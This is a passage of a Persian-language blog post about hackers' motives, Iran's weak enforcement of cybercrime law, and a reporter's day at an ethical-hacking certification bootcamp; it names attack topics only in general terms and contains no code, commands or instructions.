ﺍﺳﺖ ﮐﻪ ﺑﺮﺧﯽ ﺍﺯ ﺑﻬﺘﺮﯾﻦ ﻣﻌﻤﺎﺭﺍﻥ ﺍﺳﭙﺎﻧﯿﺎﯾﯽ ﺳﺎﺧﺘﻤﺎﻥ ﺁﻥ ﺭﺍ ﻃﺮﺍﺣﯽ ﮐﺮﺩﻩ ﺍﻧﺪ . ﮐﺎﺭﮔﺎﻩ ﻫﺎﯼ ﺁﻣﻮﺯﺷﯽ ﺍﯾﻦ ﺩﺍﻧﺸﮕﺎﻩ ﻣﻤﻠﻮ ﺍﺯ ﺩﺍﻧﺸﺠﻮﯾﺎﻧﯽ ﺍﺳﺖ ﮐﻪ ﺩﺭ ﺗﻼﺷﻨﺪ ﺑﻪ ﺷﺒﮑﻪ ﻫﺎﯼ ﺭﺍﯾﺎﻧﻪ ﯾﯽ ﻓﺮﺿﯽ ﻭ ﻭﺏ ﺳﺎﯾﺖ ﻫﺎﯼ ﺷﺨﺼﯽ ﻭ ﺗﺠﺎﺭﯼ ﺁﺯﻣﺎﯾﺸﯽ ﻧﻔﻮﺫ ﮐﻨﻨﺪ ﻭ ﺍﺯ ﺍﯾﻦ ﻟﺤﺎﻅ ﮐﺎﺭﮔﺎﻩ ﺁﻣﻮﺯﺷﯽ ﻣﺬﮐﻮﺭ ﺍﺯ ﺩﯾﺪ ﺑﺮﺧﯽ ﻫﺎ ﺷﺒﺎﻫﺖ ﻓﺮﺍﻭﺍﻧﯽ ﺑﻪ ﯾﮏ ﻣﺮﮐﺰ ﭘﺮﻭﺭﺵ ﺷﯿﻄﺎﻥ ﺩﺍﺭﺩ . ﺍﻣﺎ ﮔﺮﺩﺍﻧﻨﺪﮔﺎﻥ ﺍﯾﻦ ﺩﺍﻧﺸﮑﺪﻩ ﺍﻣﯿﺪﻭﺍﺭﻧﺪ ﺑﺎ ﺭﺍﻩ ﺍﻧﺪﺍﺯﯼ ﺍﯾﻦ ﻣﺮﮐﺰ ﺑﺴﯿﺎﺭﯼ ﺍﺯ ﺗﺎﺑﻮﻫﺎﯼ ﻧﺎﺑﺠﺎﯾﯽ ﮐﻪ ﺩﺭ ﻣﻮﺭﺩ ﭘﺪﯾﺪﻩ ﻫﮑﺮ ﻭﺟﻮﺩ ﺩﺍﺭﺩ، ﺷﮑﺴﺘﻪ ﺷﻮﺩ ﺗﺎ ﺑﺘﻮﺍﻥ ﻃﺮﺡ ﻫﺎﯼ ﺟﺪﯾﺪﯼ ﺭﺍ ﺑﺮﺍﯼ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﯾﻦ ﻣﺸﮑﻞ ﺭﻭ ﺑﻪ ﮔﺴﺘﺮﺵ ﺑﻪ ﻣﺮﺣﻠﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻭﺭﺩ . ● ﻫﺪﻑ ﯾﮏ ﻫﮑﺮ ﻫﺪﻑ ﺍﺻﻠﯽ ﻫﮑﺮﻫﺎ ﺍﺯ ﻫﮏ ﮐﺮﺩﻥ ﺳﺎﯾﺖ ﻫﺎ ﺗﺬﮐﺮ ﺑﻪ ﺻﺎﺣﺒﺎﻥ ﺳﺮﻭﺭﻫﺎ ﻭ ﺗﺎﮐﯿﺪ ﺑﺮ ﻗﺪﺭﺕ ﺍﻣﻨﯿﺘﯽ ﺗﯿﻢ ﻫﮑﺮ ﺍﺳﺖ . ﻫﮏ ﺳﺮﻭﯾﺲ ﺩﻫﻨﺪﻩ ﻫﺎ ﻓﺮﺻﺘﯽ ﺍﺳﺖ ﺗﺎ ﺷﻬﺮﺕ ﺗﯿﻢ ﻫﮑﺮ ﺍﻓﺰﺍﯾﺶ ﯾﺎﺑﺪ ﻭ ﭘﺸﺘﻮﺍﻧﻪ ﻓﻌﺎﻟﯿﺖ ﻫﺎﯼ ﺑﻌﺪﯼ ﺁﻧﻬﺎ ﻗﺮﺍﺭ ﮔﯿﺮﺩ ﮐﻪ ﺍﻟﺰﺍﻣﺎً ﺑﺎ ﻫﻤﺎﻥ ﻋﻨﺎﻭﯾﻦ ﻫﮑﺮﯼ ﺻﻮﺭﺕ ﻧﻤﯽ ﮔﯿﺮﺩ . ﺑﻪ ﻫﻤﯿﻦ ﺟﻬﺖ ﺗﻌﺪﺍﺩ ﮔﺮﻭﻩ ﻫﺎ ﻭ ﺗﯿﻢ ﻫﺎﯼ ﺍﻣﻨﯿﺘﯽ ﻫﺮ ﺭﻭﺯ ﺑﯿﺸﺘﺮ ﻣﯽ ﺷﻮﺩ . ﺧﯿﻠﯽ ﺍﺯ ﺍﯾﻦ ﻫﮑﺮﻫﺎ ﻧﯿﺰ ﺍﺯ ﻫﮏ ﮐﺮﺩﻥ ﺳﺎﯾﺖ ﻫﺎ ﮐﺴﺐ ﺩﺭﺁﻣﺪ ﻣﯽ ﮐﻨﻨﺪ ﻭﻟﯽ ﭼﮕﻮﻧﻪ؟ ﻫﮑﺮﻫﺎ ﻣﻌﻤﻮﻻً ﺩﺭ ﺻﻔﺤﻪ ﺩﯾﻔﯿﺲ ﺑﻌﺪ ﺍﺯ ﺗﺬﮐﺮ ﺑﻪ ﻣﺪﯾﺮﺍﻥ ﺍﻋﻼﻡ ﻣﯽ ﮐﻨﻨﺪ ﮐﻪ ﺍﮔﺮ ﻣﺪﯾﺮﺍﻥ ﺑﺨﻮﺍﻫﻨﺪ ﺍﯾﻦ ﮔﺮﻭﻩ ﻣﯽ ﺗﻮﺍﻧﺪ ﺑﻪ ﺻﻮﺭﺕ ﺭﺍﯾﮕﺎﻥ ﻧﻔﻮﺫ ﭘﺬﯾﺮﯼ ﺍﯾﻦ ﺳﺎﯾﺖ ﯾﺎ ﺳﺮﻭﺭ ﺭﺍ ﺑﺮﺍﯼ ﻣﺪﯾﺮﺍﻥ ﺭﻓﻊ ﮐﻨﺪ . ﻭﻟﯽ ﺩﺭ ﺑﯿﺸﺘﺮ ﻣﻮﺍﻗﻊ ﻣﺪﯾﺮ ﺳﺎﯾﺖ ﺑﻌﺪ ﺍﺯ ﺗﻤﺎﺱ ﻣﺘﻮﺟﻪ ﻣﯽ ﺷﻮﺩ ﮔﺮﻭﻩ ﺩﺭﺧﻮﺍﺳﺖ ﻫﺎﯼ ﻣﺎﻟﯽ ﻣﺸﺨﺼﯽ ﻧﯿﺰ ﺩﺍﺭﺩ . ﺍﻟﺒﺘﻪ ﺑﺴﯿﺎﺭﯼ ﺍﺯ ﻣﺪﯾﺮﺍﻥ ﺳﺎﯾﺖ ﻫﺎ ﺣﺎﺿﺮ ﻧﻤﯽ ﺷﻮﻧﺪ ﺑﻪ ﮐﺴﺎﻧﯽ ﮐﻪ ﺑﻪ ﺳﺮﻭﯾﺲ ﻫﺎﯾﺸﺎﻥ ﺣﻤﻠﻪ ﮐﺮﺩﻩ ﺍﻧﺪ، ﺍﻋﺘﻤﺎﺩ ﮐﻨﻨﺪ ﻭ ﺣﺪﺍﮐﺜﺮ ﻫﻤﮑﺎﺭﯼ ﺩﺭ ﺳﻄﺢ ﺍﻧﺘﻘﺎﻝ ﻧﻘﺎﻁ ﺿﻌﻒ ﺍﺣﺘﻤﺎﻟﯽ ﺑﻪ ﻣﺴﻮﻭﻻﻥ ﺳﺎﯾﺖ ﻫﺎ ﻣﺤﺪﻭﺩ ﻣﯽ ﻣﺎﻧﺪ . ﺷﻬﺮﺕ ﮔﺮﻭﻩ ﻫﺎﯼ ﻫﮑﺮﯼ ﺑﻪ ﺁﻧﻬﺎ ﺍﻣﮑﺎﻥ ﺟﺬﺏ ﮐﺎﺭﺁﻣﻮﺯ ﻣﯽ ﺩﻫﺪ . ﺩﺭﺁﻣﺪ ﻧﺎﺷﯽ ﺍﺯ ﺍﯾﻦ ﻓﻌﺎﻟﯿﺖ ﻫﺎ ﺑﺨﺸﯽ ﺍﺯ ﻫﺰﯾﻨﻪ ﻫﺎﯼ ﻓﻌﺎﻟﯿﺖ ﻫﮑﺮﻫﺎ ﺭﺍ ﺗﺎﻣﯿﻦ ﻣﯽ ﮐﻨﺪ . ﮔﺮﻭﻩ ﻫﮑﺮﯼ ﺑﺎ ﮔﺮﻓﺘﻦ ﻣﺒﻠﻐﯽ ﺍﺯ ﺍﻓﺮﺍﺩ ﻭ ﺩﺍﺩﻥ ﯾﮏ ﻧﺎﻡ ﮐﺎﺭﺑﺮﯼ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎ ﯾﺎ ﻧﻔﻮﺫﭘﺬﯾﺮﯼ ﻫﺎﯼ ﺟﺪﯾﺪ ﺭﺍ ﺩﺭ ﺍﺧﺘﯿﺎﺭ ﺍﻓﺮﺍﺩ ﻗﺮﺍﺭ ﻣﯽ ﺩﻫﻨﺪ ﺗﺎ ﺍﯾﻦ ﺍﻓﺮﺍﺩ ﻧﯿﺰ ﺑﺘﻮﺍﻧﻨﺪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﮐﻨﻨﺪ . ﺑﻪ ﻋﻼﻭﻩ ﺑﻌﻀﯽ ﺍﺯ ﮔﺮﻭﻩ ﻫﺎ ﺑﺎ ﺑﺮﮔﺰﺍﺭﯼ ﮐﻼﺱ ﻫﺎ ﻭ ﮐﺎﺭﮔﺎﻩ ﻫﺎﯼ ﺁﻣﻮﺯﺷﯽ ﺑﻪ ﮐﺴﺐ ﺩﺭ ﺁﻣﺪﻫﺎﯼ ﺑﯿﺸﺘﺮ ﻋﻼﻗﻪ ﻧﺸﺎﻥ ﻣﯽ ﺩﻫﻨﺪ . ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﻮﺍﻧﺎﯾﯽ ﻫﮑﺮﻫﺎ ﺩﺭ ﺍﺑﺘﺪﺍ ﺑﯿﺸﺘﺮ ﺩﺭ ﺣﻮﺯﻩ ﺧﺼﻮﻣﺖ ﻫﺎﯼ ﺷﺨﺼﯽ ﻣﻄﺮﺡ ﺑﻮﺩ ﻭﻟﯽ ﺩﺭ ﺁﯾﻨﺪﻩ ﺷﺎﻫﺪ ﺭﻭﻧﻖ ﻓﻌﺎﻟﯿﺖ ﻫﺎﯼ ﮔﺮﻭﻩ ﻫﺎﯼ ﻫﮑﺮﯼ ﺩﺭ ﭼﺎﺭﭼﻮﺏ ﺍﻫﺪﺍﻑ ﺭﻗﺒﺎﯼ ﺗﺠﺎﺭﯼ ﯾﺎ ﺳﯿﺎﺳﯽ ﺧﻮﺍﻫﯿﻢ ﺑﻮﺩ . ﺳﯿﺎﺳﺖ ﻫﺎ ﻭ ﻓﻠﺴﻔﻪ ﻫﺎﯼ ﭘﺸﺖ ﺍﯾﻦ ﻗﻀﯿﻪ ﻧﯿﺰ ﺗﻐﯿﯿﺮ ﮐﺮﺩﻩ ﺍﺳﺖ ﭼﺮﺍ ﮐﻪ ﺑﺴﯿﺎﺭﯼ ﺍﺯ ﮔﺮﻭﻩ ﻫﺎ ﺍﺯ ﻫﮑﺮﻫﺎ ﺑﺮﺍﯼ ﮐﻤﮏ ﺑﻪ ﮐﺸﻒ ﺿﻌﻒ ﻫﺎﯼ ﺍﻣﻨﯿﺘﯽ ﺳﯿﺴﺘﻢ ﻫﺎﯼ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﯽ ﮐﻨﻨﺪ . ﺍﯾﻨﺘﺮﻧﺖ ﻣﺪﺭﻥ ﺑﻪ ﻫﮑﺮﻫﺎ ﺍﺟﺎﺯﻩ ﺩﺍﺩﻩ ﺍﺳﺖ ﻣﺮﺯﻫﺎﯼ ﺟﺪﯾﺪ ﺭﺍ ﺑﮑﺎﻭﻧﺪ . ﺟﻨﮓ ﺑﯿﻦ ﮐﺸﻮﺭﻫﺎ ﺑﺎ ﻫﮏ ﮐﺮﺩﻥ ﻭﺏ ﺳﺎﯾﺖ ﻫﺎﯼ ﯾﮑﺪﯾﮕﺮ ﻭ ﺍﺯ ﮐﺎﺭ ﺍﻧﺪﺍﺧﺘﻦ ﺁﻧﻬﺎ ﯾﺎ ﭘﺎﯾﯿﻦ ﺁﻭﺭﺩﻥ ﺳﺎﯾﺖ ﻫﺎ ﺑﺎ ﺣﻤﻼﺕ DoS ﺑﻪ ﯾﮏ ﺍﻣﺮ ﻣﻌﻤﻮﻝ ﻣﺒﺪﻝ ﺷﺪﻩ ﺍﺳﺖ . ﺍﺭﺗﺶ ﻫﺎ ﺍﺯ ﻫﮑﺮﻫﺎ ﺑﻪ ﻣﻨﻈﻮﺭ ﺍﺯ ﮐﺎﺭ ﺍﻧﺪﺍﺧﺘﻦ ﺳﯿﺴﺘﻢ ﻫﺎﯼ ﺩﻓﺎﻋﯽ ﺩﺷﻤﻨﺎﻥ ﺷﺎﻥ ﺑﺮﺍﯼ ﮐﺴﺐ ﺑﺮﺗﺮﯼ ﺩﺭ ﺟﻨﮓ ﺍﺳﺘﻔﺎﺩﻩ ﻣﯽ ﮐﻨﻨﺪ . ﻣﻨﺎﻓﻊ ﻣﺎﻟﯽ ﯾﮏ ﺍﻧﮕﯿﺰﻩ ﺑﺰﺭﮒ ﺑﺮﺍﯼ ﺑﻌﻀﯽ ﺍﺯ ﻫﮑﺮﻫﺎ ﯾﺎ ﺍﻓﺮﺍﺩﯼ ﺍﺳﺖ ﮐﻪ ﻫﮑﺮﻫﺎ ﺭﺍ ﺑﻪ ﮐﺎﺭ ﻣﯽ ﮔﯿﺮﻧﺪ . ﻣﻮﺳﺴﺎﺕ ﻣﺎﻟﯽ ﺍﻏﻠﺐ ﻫﺪﻑ ﻗﺮﺍﺭ ﻣﯽ ﮔﯿﺮﻧﺪ ﺗﺎ ﻣﻘﺎﺩﯾﺮ ﺯﯾﺎﺩﯼ ﺍﺯ ﭘﻮﻝ ﺷﺎﻥ ﺗﻮﺳﻂ ﺭﻭﺵ ﻫﺎﯼ ﺍﻟﮑﺘﺮﻭﻧﯿﮏ ﺑﻪ ﺳﺮﻗﺖ ﺭﻭﺩ . ﺑﺨﺸﯽ ﺍﺯ ﺣﻤﻼﺕ ﺑﻪ ﺳﺎﯾﺖ ﻫﺎﯼ ﺩﻭﻟﺘﯽ ﺩﺭ ﺍﯾﺮﺍﻥ ﮐﻪ ﺗﻮﺳﻂ ﮔﺮﻭﻩ ﻫﺎﯼ ﻫﮑﺮﯼ ﺻﺎﺣﺐ ﻧﺎﻡ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﻭ ﻣﯽ ﺷﻮﺩ، ﻣﻤﮑﻦ ﺍﺳﺖ ﻋﻼﻭﻩ ﺑﺮ ﺍﻫﺪﺍﻑ ﺍﻗﺘﺼﺎﺩﯼ ﺑﺎ ﻫﺪﻑ ﺧﺎﺹ ﺩﯾﮕﺮﯼ ﻧﯿﺰ ﺻﻮﺭﺕ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ . ﺁﻧﭽﻪ ﺭﻭﺷﻦ ﺍﺳﺖ ﺍﯾﻦ ﺍﺳﺖ ﮐﻪ ﺩﺍﻣﻨﻪ ﻓﻌﺎﻟﯿﺖ ﻫﮏ ﺩﺭ ﺣﺎﻝ ﺍﻓﺰﺍﯾﺶ ﺍﺳﺖ ﻭ ﺳﺎﺯﻣﺎﻥ ﻫﺎ ﻭ ﺩﺳﺘﮕﺎﻩ ﻫﺎﯼ ﺯﯾﺎﺩﯼ ﻫﻢ ﺍﮐﻨﻮﻥ ﺑﻪ ﺩﻧﺒﺎﻝ ﺷﻨﺎﺧﺖ ﮔﺮﻭﻩ ﻫﺎﯼ ﻫﮑﺮﯼ ﻫﺴﺘﻨﺪ . ﺭﻗﺎﺑﺘﯽ ﮐﻪ ﺗﺎﺯﻩ ﺁﻏﺎﺯ ﺷﺪﻩ ﻭ ﺗﺎ ﻣﺪﺕ ﻫﺎ ﺍﺩﺍﻣﻪ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ . ﻭﻟﯽ ﺁﻧﭽﻪ ﺍﮐﻨﻮﻥ ﺑﺎﯾﺪ ﭘﯿﮕﯿﺮﯼ ﮐﺮﺩ ﺍﯾﻦ ﺍﺳﺖ ﮐﻪ ﺁﯾﺎ ﻫﮑﺮﻫﺎ ﻣﯽ ﺗﻮﺍﻧﻨﺪ ﺗﺎ ﻫﺮ ﺯﻣﺎﻥ ﻫﺮ ﮐﺎﺭﯼ ﺩﻝ ﺷﺎﻥ ﺧﻮﺍﺳﺖ ﺭﻭﯼ ﺳﺮﻭﺭ ﻭ ﺳﺎﯾﺖ ﻫﺎﯼ ﺩﯾﮕﺮ ﺍﻓﺮﺍﺩ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ؟ ﺻﻨﻌﺖ ﻧﻮﭘﺎﯼ ﻓﻨﺎﻭﺭﯼ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﯾﺮﺍﻥ، ﻫﻢ ﺍﯾﻨﮏ ﺍﺯ ﺑﻌﺪ ﻗﺎﻧﻮﻥ ﻣﺪﺍﺭﯼ ﻭ ﻣﺴﺘﻨﺪﺳﺎﺯﯼ ﺣﻘﻮﻗﯽ ﺑﺮﺍﯼ ﻣﺒﺎﺭﺯﻩ ﺑﺎ ﻣﺘﺨﻠﻔﺎﻥ ﻭ ﻣﺠﺮﻣﺎﻥ ﻧﺎﻗﺾ ﻓﻀﺎﯼ ﻣﺠﺎﺯﯼ ﺩﺭ ﻭﺿﻌﯿﺖ ﻧﺎﻣﻄﻠﻮﺑﯽ ﺑﻪ ﺳﺮﻣﯽ ﺑﺮﺩ . ﺍﮔﺮﭼﻪ ﺩﺭ ﺳﺎﻝ ﻫﺎﯼ ﺍﺧﯿﺮ ﻻﯾﺤﻪ ﻫﺎﯾﯽ ﻣﺎﻧﻨﺪ ﺁﺯﺍﺩﯼ ﺍﻃﻼﻋﺎﺕ، ﺟﺮﺍﺋﻢ ﺭﺍﯾﺎﻧﻪ ﯾﯽ ﻭ ﮐﭙﯽ ﺭﺍﯾﺖ ﺑﻪ ﺗﻬﯿﻪ ﻭ ﺗﺼﻮﯾﺐ ﻣﺮﺍﺟﻊ ﺫﯼ ﺻﻼﺡ ﺭﺳﯿﺪﻩ ﺍﺳﺖ، ﻭﻟﯽ ﻧﺒﻮﺩ ﺿﻤﺎﻧﺖ ﺍﺟﺮﺍﯾﯽ ﻗﻮﯼ ﺑﺮﺍﯼ ﺑﺮﺧﻮﺭﺩ ﺑﺎ ﻣﺘﺨﻠﻔﺎﻥ ﻭ ﭘﯿﺎﺩﻩ ﺳﺎﺯﯼ ﻣﻔﺎﺩ ﻗﺎﻧﻮﻧﯽ ﺩﺭ ﺑﺎﺯﺍﺭ ﺻﻨﻌﺖ IT ﮐﺸﻮﺭ، ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﭼﺎﻟﺶ ﻫﺎﯾﯽ ﺭﺍ ﺑﻪ ﻭﺟﻮﺩ ﺁﻭﺭﺩﻩ ﺍﺳﺖ . ﺑﻪ ﻫﺮ ﺣﺎﻝ ﺟﺎﻣﻌﻪ ﺍﻃﻼﻋﺎﺗﯽ ﺍﯾﺮﺍﻥ ﺩﺭ ﺍﺑﻌﺎﺩ ﺣﻘﻮﻗﯽ ﻣﺘﻨﻮﻋﯽ ﺑﺎﯾﺪ ﺍﺯ ﭘﺘﺎﻧﺴﯿﻞ ﻫﺎﯼ ﻣﻮﺟﻮﺩ ﺁﮔﺎﻩ ﺷﻮﺩ

برچسب: تیر هکرها به کجا شلیک میشود؟, نویسنده: SASHA PAYDAR تاريخ: دوشنبه 9 شهريور 1394 ساعت: 9:08

ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻣﻦ ﻫﯿﭻﮔﺎﻩ ﺑﻪ ﭘﺎﺩﮔﺎﻥ ﻧﺮﻓﺘﻢ ﻭ ﻟﺒﺎﺱ ﻧﻈﺎﻣﯽ ﻫﻢ ﻧﭙﻮﺷﯿﺪﻡ ﻭ ﺑﺎ ﺍﺳﻠﺤﻪ ﺭﮊﻩ ﻧﺮﻓﺘﻢ، ﺗﺎ ﺑﻪ ﺣﺎﻝ ﻫﯿﭻ ﺍﺭﺩﻭﯾﯽ ﺭﺍ ﺗﺠﺮﺑﻪ ﻧﻜﺮﺩﻩﺍﻡ . ﺍﻣﺎ ﺩﺭ ﯾﻜﯽ ﺍﺯ ﻫﻤﯿﻦ ﺭﻭﺯﻫﺎ ﺑﻪ ﯾﻚ ﺍﺭﺩﻭﯼ ﺁﻣﻮﺯﺷﯽ ﺑﺮﺍﯼ ﻫﻜﺮﻫﺎ ﺭﻓﺘﻢ . ﯾﻚ ﺭﻭﺯ ﺭﺍ ﺑﻪ ﻃﻮﺭ ﻛﺎﻣﻞ ﺻﺮﻑ ﻓﻬﻤﯿﺪﻥ ﻧﻜﺎﺕ ﻛﺎﺭﯼ ﻫﻜﺮﻫﺎ ﻛﺮﺩﻡ ﻭ ﺩﺳﺖ ﻧﻮﺷﺘﻪﻫﺎﯾﯽ ﺭﺍ ﮔﯿﺮ ﺁﻭﺭﺩﻡ ﻛﻪ ﺣﺎﻭﯼ ﻣﻄﺎﻟﺐ ﺁﻣﻮﺯﺷﯽ ﺑﺮﺍﯼ ﺑﻪ ﻫﻢ ﺭﯾﺨﺘﻦ ﺩﻧﯿﺎﯼ ﺭﺍﯾﺎﻧﻪﻫﺎ ﺑﻮﺩ . ﻫﺪﻑ ﺷﺮﻛﺖ ﻣﯿﺰﺑﺎﻥ، TechTrain، ﯾﻚ ﺍﺭﺩﻭﯼ ﺁﻣﻮﺯﺷﯽ ﺍﺧﻼﻗﯽ ﺑﻮﺩ ﻭ ۲۴ ﻧﻔﺮ ﺭﺍ ﺑﻪ ﺁﻥ ﺩﻋﻮﺕ ﻛﺮﺩﻩ ﺑﻮﺩ . ﻣﺮﺑﯽ ﻣﻦ ﺩﺭ ﺁﻥ ﺩﻭﺭﻩ، ﺁﻧﺪﺭﻩ ﻭﯾﺘﺎﻛﺮ، ﻣﺪﯾﺮ ﺑﺨﺶ ﺍﻣﻨﯿﺘﯽ ﺷﺮﻛﺖ ﺑﻮﺩ ﻛﻪ ﺩﻩ ﺳﺎﻟﯽ ﺭﺍ ﺩﺭ ﺳﯿﺴﺘﻢﻫﺎﯼ ﺍﻣﻨﯿﺘﯽ ﺑﺎﻧﻚﻫﺎ ﻭ ﺁﻣﻮﺯﺵ ﻧﻜﺎﺕ ﻻﺯﻡ ﺩﺭ ﺍﯾﻤﻨﯽ ﺳﯿﺴﺘﻢﻫﺎﯼ ﺍﻟﻜﺘﺮﻭﻧﯿﻜﯽ ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﯽ ﮔﺬﺭﺍﻧﺪﻩ ﺑﻮﺩ . ﺍﻭ ﭘﯿﺶ ﺍﺯ ﺷﺮﻭﻉ ﻣﻄﺎﻟﺐ ﻛﻼﺱ، ﺧﻼﺻﻪﺍﯼ ﺍﺯ ﺁﻧﭽﻪ ﺭﺍ ﻛﻪ ﻗﺮﺍﺭ ﺑﻮﺩ ﺑﻪ ﻣﻦ ﺑﯿﺎﻣﻮﺯﺩ، ﮔﻔﺖ؛ ﭼﮕﻮﻧﻪ ﻭﯾﺮﻭﺱ ﺑﻨﻮﯾﺴﻢ، ﭼﮕﻮﻧﻪ ﺷﺒﻜﻪﻫﺎﯼ ﺑﯽﺳﯿﻢ ﺭﺍ ﺑﻪ ﻫﻢ ﺑﺮﯾﺰﻡ ﻭ ﭼﮕﻮﻧﻪ ﺍﺯ ﺩﺍﻡ ﺩﯾﻮﺍﺭﻩﻫﺎﯼ ﺁﺗﺶ ﺑﮕﺮﯾﺰﻡ . ●ﭼﻪ ﺷﯿﺮﯾﻦ ! ﺷﺎﮔﺮﺩﺍﻥ ﻛﻼﺳﯽ ﻛﻪ ﻣﻦ ﺩﺭ ﺁﻥ ﺑﻮﺩﻡ، ﻣﺮﺩﺍﻥ ﻣﯿﺎﻧﺴﺎﻟﯽ ﺑﻮﺩﻧﺪ ﻛﻪ ﻣﺪﯾﺮﯾﺖ ﺳﯿﺴﺘﻢﻫﺎﯼ ﭘﯿﺸﺮﻓﺘﻪﺍﯼ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺷﺘﻨﺪ . ﺁﻥﻫﺎ ﺩﺭ ﺍﯾﻦ ﺩﻭﺭﻩ ۴۳۰۰ﺩﻻﺭﯼ ﺷﺮﻛﺖ ﻛﺮﺩﻩ ﺑﻮﺩﻧﺪ ﺗﺎ ﺑﻔﻬﻤﻨﺪ ﭼﻪ ﻧﻜﺎﺕ ﺗﺎﺯﻩﺍﯼ ﺍﺯ ﺗﻬﺪﯾﺪﺍﺕ ﺭﺍﯾﺎﻧﻪﺍﯼ ﻣﻄﺮﺡ ﺷﺪﻩ ﺍﺳﺖ . ﻏﺎﻟﺐ ﺍﯾﻦ ﺍﻓﺮﺍﺩ ﺑﺮﺍﯼ ﺷﺮﻛﺖﻫﺎﯼ ﺳﺎﺯﻧﺪﻩ ﺭﺍﯾﺎﻧﻪ، ﺷﺮﻛﺖﻫﺎﯼ ﻧﺮﻡﺍﻓﺰﺍﺭﯼ ﯾﺎ ﺑﺮﺍﯼ ﺍﻓﺮﺍﺩﯼ ﻛﺎﺭ ﻣﯽﻛﺮﺩﻧﺪ ﻛﻪ ﺣﻔﻆ ﺍﻣﻨﯿﺖ ﻛﺎﻣﭙﯿﻮﺗﺮﻫﺎﯾﺸﺎﻥ ﺑﺮﺍﯾﺸﺎﻥ ﺍﻫﻤﯿﺖ ﺩﺍﺷﺖ . ﯾﻚ ﻧﻔﺮ ﺍﺯ ﺟﺪﺍﻝ ﺗﻤﺎﻡ ﻧﺸﺪﻧﯽ ﺧﻮﺩ ﺑﺎ ﻫﻤﺴﺮﺵ ﺩﺭﺑﺎﺭﻩ ﻛﺎﺭ ﺑﺎ ﻛﺎﻣﭙﯿﻮﺗﺮ ﺣﺮﻑ ﻣﯽﺯﺩ ﻭ ﯾﻜﯽ ﺩﯾﮕﺮ ﺑﺮﺍﯼ ﺧﻨﺪﺍﻧﺪﻥ ﺩﯾﮕﺮﺍﻥ ﭼﯿﺰﯼ ﻣﯽﮔﻔﺖ . ﺍﻣﺎ ﺩﺭ ﺍﯾﻦ ﻣﯿﺎﻥ ﻭﯾﺘﺎﻛﺮ ﺑﺎ ﻧﻜﺘﻪﻫﺎﯾﯽ ﻛﻪ ﺩﺭﺑﺎﺭﻩ ﭼﮕﻮﻧﮕﯽ ﻓﺮﺍﺭ ﺍﺯ ﺗﻠﻪﻫﺎﯼ ﺍﻣﻨﯿﺘﯽ ﯾﻚ ﺷﺮﻛﺖ ﻭ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻥ ﻣﯽﮔﻔﺖ، ﺗﺤﺴﯿﻦ ﻫﻤﻪ ﺭﺍ ﺑﺮﻣﯽﺍﻧﮕﯿﺨﺖ . ﺧﻮﺩ ﻭﯼ ﻧﯿﺰ ﻛﻪ ﺩﺭ ﺍﻭﻗﺎﺕ ﻓﺮﺍﻏﺖ، ﻭﻗﺘﺶ ﺭﺍ ﺻﺮﻑ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﻫﻜﺮﻫﺎ ﻣﯽﻛﻨﺪ، ﻣﯽﺍﯾﺴﺘﺎﺩ ﻭ ﺍﺯ ﻣﺎ ﻣﯽﭘﺮﺳﯿﺪ : ﻣﻄﺎﻟﺒﺶ ﺟﺎﻟﺐ ﺍﺳﺖ ﯾﺎ ﻧﻪ؟ ﺷﺎﯾﺪ ﻣﯽﺧﻮﺍﺳﺖ ﺑﺎ ﺍﯾﻦ ﻛﺎﺭ ﻫﯿﺠﺎﻥ ﺁﻣﻮﺯﺵ ﺭﺍ ﺑﯿﺸﺘﺮ ﻛﻨﺪ ! ● ﺗﻮﻟﺪ ﺗﺎﺯﻩ ﻫﯿﺠﺎﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﯾﺎ ﻧﻪ، ﺍﯾﻦ ﺍﺭﺩﻭ ﻛﺎﻣﻼً ﺟﺪﯼ ﺍﺳﺖ ﻭ ﺍﻓﺮﺍﺩ ﺣﺎﺿﺮ ﺩﺭ ﺁﻥ، ﻫﺪﻑ ﺧﺎﺻﯽ ﺭﺍ ﺩﻧﺒﺎﻝ ﻣﯽﻛﻨﻨﺪ : ﻛﺴﺐ ﻣﺪﺭﻙ >ﻫﻜﺮ ﺍﺧﻼﻗﻤﻨﺪ < ﻛﻪ ﺗﻮﺳﻂ ﺍﻧﺠﻤﻦ ﺑﯿﻦﺍﻟﻤﻠﻠﯽ ﻣﺸﺎﻭﺭﺍﻥ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﯿﻚ ﺩﺍﺩﻩ ﻣﯽﺷﻮﺩ . ﺍﯾﻦ ﮔﺮﻭﻩ ﺳﺎﻝﻫﺎﺳﺖ ﭼﻨﯿﻦ ﺑﺮﻧﺎﻣﻪﺍﯼ ﺭﺍ ﻣﺪﯾﺮﯾﺖ ﻣﯽﻧﻤﺎﯾﺪ، ﺍﻣﺎ ﺩﺭ ﺣﺎﻝ ﺣﺎﺿﺮ ﺑﯿﺶ ﺍﺯ ﻫﺮ ﺯﻣﺎﻥ ﺩﯾﮕﺮ ﻧﯿﺎﺯ ﺑﻪ ﻣﺘﺨﺼﺼﺎﻧﯽ ﺍﺣﺴﺎﺱ ﻣﯽﺷﻮﺩ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﻣﺎﻧﻨﺪ ﻫﻜﺮﻫﺎﯼ ﻣﺨﺮﺏ ﻓﻜﺮ ﻛﻨﻨﺪ . ﺯﻣﺎﻧﯽ ﺷﺮﻛﺖﻫﺎ ﺑﺮﺍﯼ 